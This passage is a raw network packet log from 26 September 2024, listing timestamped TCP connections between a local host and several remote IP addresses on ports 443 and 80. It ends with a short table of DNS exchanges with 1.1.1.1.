                        Sep 26, 2024 09:58:17.712655067 CEST49727443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:17.714059114 CEST49727443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:17.714071035 CEST44349727188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:17.714355946 CEST44349727188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:17.758476019 CEST49727443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:17.766263962 CEST49727443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:17.811400890 CEST44349727188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:17.872530937 CEST44349727188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:17.872622967 CEST44349727188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:17.872665882 CEST49727443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:17.876250029 CEST49727443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:17.879894972 CEST4971980192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:17.884702921 CEST8049719158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:18.033339977 CEST8049719158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:18.035471916 CEST49728443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:18.035573006 CEST44349728188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:18.035667896 CEST49728443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:18.035969019 CEST49728443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:18.036009073 CEST44349728188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:18.086607933 CEST4971980192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:18.509367943 CEST44349728188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:18.520901918 CEST49728443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:18.520982027 CEST44349728188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:18.647182941 CEST44349728188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:18.647269011 CEST44349728188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:18.647442102 CEST49728443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:18.666476965 CEST49728443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:18.748158932 CEST4971980192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:18.749447107 CEST4972980192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:18.753400087 CEST8049719158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:18.753451109 CEST4971980192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:18.754264116 CEST8049729158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:18.754332066 CEST4972980192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:18.754442930 CEST4972980192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:18.759223938 CEST8049729158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:19.067699909 CEST8049724158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:19.068941116 CEST49730443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:19.069060087 CEST44349730188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:19.069144011 CEST49730443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:19.069439888 CEST49730443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:19.069484949 CEST44349730188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:19.117863894 CEST4972480192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:19.340846062 CEST8049729158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:21.085911989 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.102010965 CEST44349735188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:21.102108002 CEST44349735188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:21.105711937 CEST49735443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:21.106215954 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.106312037 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.125741005 CEST49735443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:21.151453972 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.151542902 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.151566029 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.151576042 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.151622057 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.151638985 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.151704073 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.151871920 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.151947021 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.151954889 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.151971102 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.152004004 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.152029037 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.152057886 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.152194977 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.152250051 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.152250051 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.152256966 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.152453899 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.152616024 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.152621031 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.152689934 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.152700901 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.152710915 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.152779102 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.152784109 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.152879000 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.152945995 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.153002977 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.153076887 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.153175116 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.153237104 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.153290987 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.153311968 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.153316021 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.153388977 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.153615952 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.161672115 CEST49736443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:21.161699057 CEST44349736188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:21.165868044 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.169683933 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.172683001 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.172743082 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.172744989 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.172755003 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.172890902 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.172890902 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.238373041 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.238491058 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.238526106 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.238526106 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.238535881 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.238554001 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.238575935 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.238584995 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.238590002 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.238630056 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.238806009 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.238920927 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.239111900 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.239191055 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.239324093 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.239373922 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.239382029 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.239443064 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.239558935 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.239602089 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.239623070 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.239625931 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.239677906 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.239677906 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.239684105 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.239703894 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.239748955 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.239763975 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.239834070 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.239940882 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.240020037 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.240166903 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.240300894 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.240314007 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.240330935 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.240407944 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.252547979 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.252547979 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.259707928 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.259767056 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.259816885 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.259826899 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.259876013 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.259876013 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.268735886 CEST44349736188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:21.268838882 CEST44349736188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:21.268893957 CEST49736443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:21.269347906 CEST49736443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:21.325229883 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.325407982 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.325442076 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.325540066 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.325547934 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.325627089 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.325633049 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.325700045 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.325712919 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.325717926 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.325757027 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.325757027 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.325956106 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.326006889 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.326025009 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.326029062 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.326059103 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.326073885 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.326108932 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.326217890 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.326271057 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.326391935 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.326420069 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.326494932 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.326586008 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.326647997 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.326754093 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.326842070 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.327066898 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.327130079 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.327158928 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.327162027 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.327263117 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.327264071 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.330744982 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.330744982 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.341917038 CEST4973480192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:21.345942020 CEST4973780192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:21.346412897 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.346467018 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.346487999 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.346496105 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.346565962 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.346601963 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.346601963 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.346609116 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.346627951 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.346735954 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.347026110 CEST8049734158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:21.347120047 CEST4973480192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:21.350778103 CEST8049737158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:21.350975990 CEST4973780192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:21.351094961 CEST4973780192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:21.355813980 CEST8049737158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:21.412059069 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.412152052 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.412374973 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.412437916 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.412523985 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.412579060 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.412631989 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.412681103 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.412705898 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.412782907 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.412895918 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.412986994 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.413043976 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.413043976 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.413048983 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.413160086 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.413332939 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.413338900 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.413356066 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.413397074 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.413399935 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.413413048 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.413429022 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.413456917 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.413460970 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.413535118 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.413535118 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.413589954 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.413657904 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.413724899 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.413781881 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.413990021 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.414092064 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.414117098 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.414119959 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.414185047 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.414185047 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.433305979 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.433449030 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.433485031 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.433568954 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.499329090 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.499413013 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.499425888 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.499433994 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.499501944 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.499516964 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.499521017 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.499553919 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.499576092 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.499624014 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.499634027 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.499649048 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.499700069 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.499700069 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.499763012 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.499850988 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.499986887 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.500051022 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.500083923 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.500251055 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.500255108 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.500325918 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.500503063 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.500591993 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.500595093 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.500731945 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.500802040 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.500880957 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.500895023 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.500899076 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.500931025 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.500950098 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.520374060 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.520450115 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.520498037 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.520503998 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.520526886 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.521156073 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586074114 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586150885 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586174965 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586179972 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586211920 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586226940 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586226940 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586232901 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586258888 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586360931 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586415052 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586472988 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586496115 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586502075 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586534977 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586570024 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586651087 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586730957 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586788893 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586843014 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586899042 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.587018013 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.587076902 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.587181091 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.587408066 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.587486029 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.587544918 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.587718964 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.587723017 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.587819099 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.587901115 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.587999105 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.588044882 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.588051081 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.588051081 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.588058949 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.588114023 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.607558012 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.607628107 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.607723951 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.607723951 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.607733965 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.649111986 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673012972 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673082113 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673115015 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673121929 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673158884 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673201084 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673201084 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673206091 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673235893 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673367023 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673438072 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673485994 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673540115 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673608065 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673667908 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673825979 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673886061 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673890114 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673942089 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673985004 CEST49732443192.168.2.567.212.175.162
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Sep 26, 2024 09:57:58.250614882 CEST | 57213 | 53 | 192.168.2.5 | 1.1.1.1
                        Sep 26, 2024 09:57:58.490430117 CEST | 53 | 57213 | 1.1.1.1 | 192.168.2.5
                        Sep 26, 2024 09:58:01.792212009 CEST | 49355 | 53 | 192.168.2.5 | 1.1.1.1
                        Sep 26, 2024 09:58:01.799412966 CEST | 53 | 49355 | 1.1.1.1 | 192.168.2.5
                        Sep 26, 2024 09:58:03.014956951 CEST | 63737 | 53 | 192.168.2.5 | 1.1.1.1
                        Sep 26, 2024 09:58:03.022213936 CEST | 53 | 63737 | 1.1.1.1 | 192.168.2.5
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
